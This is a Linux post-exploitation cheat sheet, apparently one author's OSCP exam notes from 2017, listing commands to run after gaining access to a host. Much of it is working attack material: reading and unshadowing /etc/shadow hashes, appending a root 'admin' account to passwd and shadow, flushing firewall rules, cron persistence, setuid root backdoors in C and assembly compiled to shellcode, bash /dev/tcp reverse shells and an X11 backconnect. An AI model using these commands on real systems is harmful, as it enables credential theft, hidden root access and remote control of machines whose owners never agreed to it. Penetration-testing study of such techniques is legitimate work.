|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 07.09.2017

Linux post exploitation


This command list was also part of my notes for the Offensive Security Certified Professional exam. It summarizes some useful methods to gather information on a linux host after having gained command execution.

upgrade shell


To upgrade your shell to a fully functional interactive shell use the following commands

python -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
reset

login information


A first step should be to determine which privileges you have and how often the system is accessed by other users.

show user privileges

id
whoami

login history

w
who
last
lastlog

system information


distro and kernel info

cat /etc/issue
uname -a

hostname

hostname
hostname -f

running tasks

ps aux
pstree
kill -9 1234
killall ...

installed packages

dpkg -l
yum list installed
pacman -Q

user management


usernames and password hashes

cat /etc/passwd
cat /etc/shadow
unshadow passwd shadow > passwd.unshadow
ls -l /home
echo "admin:x:0:0:admin,,,:/root:/bin/bash" >> /etc/passwd
echo "admin:`openssl passwd -6 password`:12345:0:99999:7:::" >> /etc/shadow
echo "admin:`echo password | mkpasswd -m sha-512 -s`:12345:0:99999:7:::" >> /etc/shadow

network configuration


network interfaces

ip l
ip a

routes

ip r
ip r l t 0
ip r a 10.1.1.0/24 via 192.168.11.3
netstat -r

dns server

cat /etc/resolv.conf

open ports

netstat -tunap
ss -ltun

firewall rules

iptables -L
iptables -F

enable ssh

/etc/init.d/ssh start
service ssh start
systemctl start ssh

network


network scan

for ip in {1..254}; do arping -w1 -c1 192.168.199.$ip ; done

arp cache

arp -n
ip n

active connections

ss -tun
lsof -nPi

file system


df -h
lsblk -f
mount
mount -o remount,rw,exec /

searching files


grep

grep -rHi "string" /path

find

find /path -type f -exec grep -Hi "string" {} \;
find / -iname *\.bak -perm -004 -ls 2>/dev/null
find / -type f -amin -60 2>/dev/null
find / -perm /6000 -ls 2>/dev/null

sceduled tasks


list sceduled scripts

ls /etc/cron.*
cat /etc/crontab
crontab -l

add new task

echo "* * * * * root date >> /tmp/log" >> /etc/crontab
crontab -e
crontab -r

network file system


find and mount

nmap -Pn <network> -p 111,2049
showmount -e <target>
mount -t nfs <target>:/folder /mnt/nfs

squashfs


modify squashfs image

unsquashfs image.file
vim squashfs-root/<file_to_change>
mksquashfs squashfs-root/ new_image.file -noappend -always-use-fragments

selfmade backdoors


setuid.c

#include <unistd.h>       
#include <stdlib.h>       

void main(void){          
    setuid(0);            
    system("/bin/bash");  
} 

setuid.asm

BITS 32
global _start
section .text
_start:

xor ebx,ebx
lea eax,[ebx+17h]
cdq
int 80h

xor ecx,ecx
push ecx
push 0x68732f6e
push 0x69622f2f
lea eax,[ecx+0bh]
mov ebx,esp
int 80h

compile asm

nasm -f elf setuid.asm
ld -o setuid -melf_i386 setuid.o

compile to shellcode

nasm -f bin setuid.asm -o shellcode
xxd -p shellcode

bash backconnect


The bash offers a pseudo device for creating network connections. The second command is an alternative doing the same as the first.

/bin/bash -i < /dev/tcp/localhost/8888 1>&0 2>&0
/bin/bash -i &> /dev/tcp/localhost/8888 0>&1

xserver backconect


To connect graphical applications to your local xserver you can use Xnest

Xnest :1

or configure x11 to allow inbound tcp connections and reboot.

/etc/gdm/custom.conf

[security]
DisallowTCP=false

In both cases you have to disable access control with

xhost +

On the victim you can start

xterm -display <target-ip>:1